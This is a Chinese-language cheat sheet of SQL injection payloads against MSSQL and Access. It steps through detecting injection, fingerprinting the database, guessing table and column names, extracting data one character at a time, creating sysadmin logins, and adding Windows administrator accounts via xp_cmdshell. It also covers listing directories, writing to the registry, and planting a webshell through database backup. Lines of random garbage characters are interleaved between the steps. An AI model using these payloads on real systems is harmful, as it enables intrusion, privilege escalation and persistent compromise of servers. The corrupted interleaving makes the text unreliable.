1.判断是否有注入：;and 1=1 与 ;and 1=2 ——比较两次请求的响应，只有在前者正常、后者异常或无结果时才说明参数被带入了查询
2.初步判断是否是 mssql：;and user>0 ——利用字符型的 user 与整数比较时的类型转换报错回显当前用户名；若页面不回显数据库错误信息，此法无法判断
c,@&Z#IZ`
3.注入参数是字符型时：'and [查询条件] and ''='
l$[7pM[
4.搜索处未过滤参数时：'and [查询条件] and '%25'='  （%25 即 URL 编码后的 %，一般用于闭合 LIKE '%...%' 中的通配符）
Y7*8 A,
5.判断数据库系统（通过各自的系统表是否存在来区分）
=n@"lY u[
;and (select count(*) from sysobjects)>0  成立则为 mssql
wPr9N}rf
;and (select count(*) from msysobjects)>0  成立则为 access
Q)]C~Q
t)qu@m?FZ)
HpLCOY1-
6.猜表名：;and (select count(*) from [表名])>0  （from 后面填的是表名，猜对时条件成立）
VrQgn9L
7.猜字段名：;and (select count(字段名) from 表名)>0
_PPZ!r(
8.猜字段中记录的长度：;and (select top 1 len(字段名) from 表名)>0  （改变比较的数值可逐步确定长度）
8-#_xsZ^;
9.(1)猜字段的 ascii 值（access，用 asc/mid）
PI G3kJ
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0  （改变 mid 的位置参数和比较的数值，逐字符猜解）
?Z^?A^; }$
(2)猜字段的 ascii 值（mssql，用 unicode/substring）
8Cx6Me>,=
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0  （改变 substring 的位置参数和比较的数值，逐字符猜解）
lL\%eQ
YL?2gBT
10.测试权限结构(mssql)：IS_SRVROLEMEMBER/IS_MEMBER 在当前登录是该角色成员时返回 1，不是成员返回 0，角色名无效返回 NULL；下面各条只有在是成员时 and 1=1 才成立
2([
z:Y
Z]
,r5'nDV=d
r!+..c
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--  是否为 sysadmin（后续加帐户、xp_cmdshell 等操作基本都依赖此权限）
C4[) yJ
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
X&LaAqlSG
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
cePe0\\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
4,('+
;OMR5KAz
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
CE5A^,EsB
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
$.+_f,tU
;and 1=(select IS_MEMBER('db_owner'));--  （数据库角色用 IS_MEMBER，服务器角色用 IS_SRVROLEMEMBER）
42oW]b%P{;
B}(r>8?dm
~:JoKm`vU
11.添加 mssql 和系统的帐户（需要相应权限，执行前先按第 10 节确认当前登录是否为 sysadmin；sp_addlogin/sp_password/sp_addsrvrolemember 已被标记为弃用，新版本对应的是 CREATE LOGIN/ALTER LOGIN/ALTER SERVER ROLE）
QjlQsN!
;exec master.dbo.sp_addlogin username;--  新建登录名（未指定密码时密码为空）
;exec master.dbo.sp_password null,password,username;--  设置密码，参数顺序为 旧密码,新密码,登录名，注意不要把登录名和密码写反
s'4O]k`
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--  加入 sysadmin 角色，参数顺序为 登录名,角色名，两者之间需要逗号
WrHY'
L*6R5i>
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--  通过 xp_cmdshell 添加系统帐户；xp_cmdshell 自 SQL Server 2005 起默认禁用，且命令以 SQL Server 服务帐户的权限运行，net user/localgroup 要求该帐户在主机上具备管理员权限
H*H~~yQ
;exec master.dbo.xp_cmdshell 'net user username password /add';--  上一条的简化写法
;!hwcO kX
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--  把该帐户加入本地 administrators 组
&wa2MNCG8
,*kh{lJ
Y&uwi:_g
12.(1)遍历目录（把 xp_dirtree 的输出写入自建表，再利用类型转换报错逐条读出）
%O|+`"
;create table dirs(paths varchar(100), id int)  （两列分别接收 xp_dirtree 返回的子目录名和深度；路径长于 100 字符时插入可能因截断而失败，可适当放大）
eF"k"Ckt'
;insert dirs exec master.dbo.xp_dirtree 'c:\'
$2E&~W %
;and (select top 1 paths from dirs)>0  （字符串与整数比较触发转换报错，从报错信息中读出第一条 paths）
ey]WoUZ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0  （把已读出的路径依次填入 not in 列表，逐条取出其余路径；用完后 drop table dirs 以减少痕迹）
a$=He
Ro@=oyLE
Lcz`
(2)遍历目录（同样借助自建表接收扩展存储过程的输出）
F$j?}
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--  四列对应 xp_availablemedia 的四列输出
;insert temp exec master.dbo.xp_availablemedia;--  获得当前所有驱动器
^'ws/(
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--  获得子目录列表
|}o6N5)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--  获得所有子目录的目录树结构（两列：子目录名、深度）
8w$q4fg0
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--  查看文件内容（同样依赖 xp_cmdshell 已启用）
60R]Q
/UqIkc
4 KX\'K
13.mssql 中与注册表相关的扩展存储过程（xp_reg* 一般需要 sysadmin 权限，写入和删除尤其如此）
LO;?#e7
xp_regenumvalues 注册表根键, 子键
9i46u20
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'  以多个记录集方式返回该子键下的所有键值
5m
yQBKE
xp_regread 根键,子键,键值名
`F$lO2 #k
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'  返回指定键值的内容
m%cwhH_B
xp_regwrite 根键,子键, 值名, 值类型, 值
}60/5HNr
值类型有 2 种：REG_SZ 表示字符串，REG_DWORD 表示整数
FN/siw(?3
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'  写入注册表（会留下明显痕迹，测试完应删除该值）
r4M;]
xp_regdeletevalue 根键,子键,值名
c2u*<x
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'  删除某个值
]
T<#bNK\1
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'  删除键，包括该键下的所有值
jN AS'JV
6~-,.{Y
IuY4R0Go
14.利用 mssql 的 backup 创建 webshell（需要对该数据库的 BACKUP DATABASE 权限，且 SQL Server 服务帐户对目标路径有写权限；写出的文件除插入的内容外还夹杂备份格式的二进制数据，脚本解释器一般会忽略脚本标记之外的部分）
lhPxMMS`j
use model  （注意：model 是新建数据库的模板，在其中建的表会被此后创建的所有数据库继承，痕迹明显；也可改用其他有权限的数据库）
u`;P^t5
create table cmd(str image);
sp&gw XPG
insert into cmd(str) values ('');  （此处的空字符串应替换为 webshell 脚本内容）
P*]hXm85[K
backup database model to disk='c:\l.asp';  （路径是数据库服务器的本地路径；若 SQL Server 与 web 服务不在同一台机器上，写出的文件无法通过 web 访问）
}tO>&$
Z6f
)x<BeD
F/cA tT.M?
15.mssql 内置函数（同样依赖类型转换报错回显）
-zzoz x]S=
;and (select @@version)>0  获得 SQL Server 版本信息（返回的版本字符串中同时包含操作系统版本）
,h9?o
;and user_name()='dbo'  判断当前数据库用户是否为 dbo（sa 及其他 sysadmin 成员在各库中映射为 dbo，但数据库所有者同样是 dbo，因此成立并不等于一定是 sa；要看登录名可用 system_user）
`nRF"T_
;and (select user_name())>0  爆当前数据库用户名
Us.k,
;and (select db_name())>0  爆当前连接的数据库名
_\gCdNrD
@*E=O |
Sf*gAwnW
16.简洁的 webshell（做法与第 14 节相同，仅输出路径不同，同样受备份权限和服务帐户写权限限制）
<.2jQ#So
use model  （model 是新建数据库的模板，在其中建的表会被此后创建的所有数据库继承）
pL . 0_
create table cmd(str image);
^zW=s$\Fo
insert into cmd(str) values ('');  （此处的空字符串应替换为 webshell 脚本内容）
\EXa 9X2
backup database model to disk='g:\wwwtest\l.asp';  （路径为数据库服务器上 web 目录的本地路径）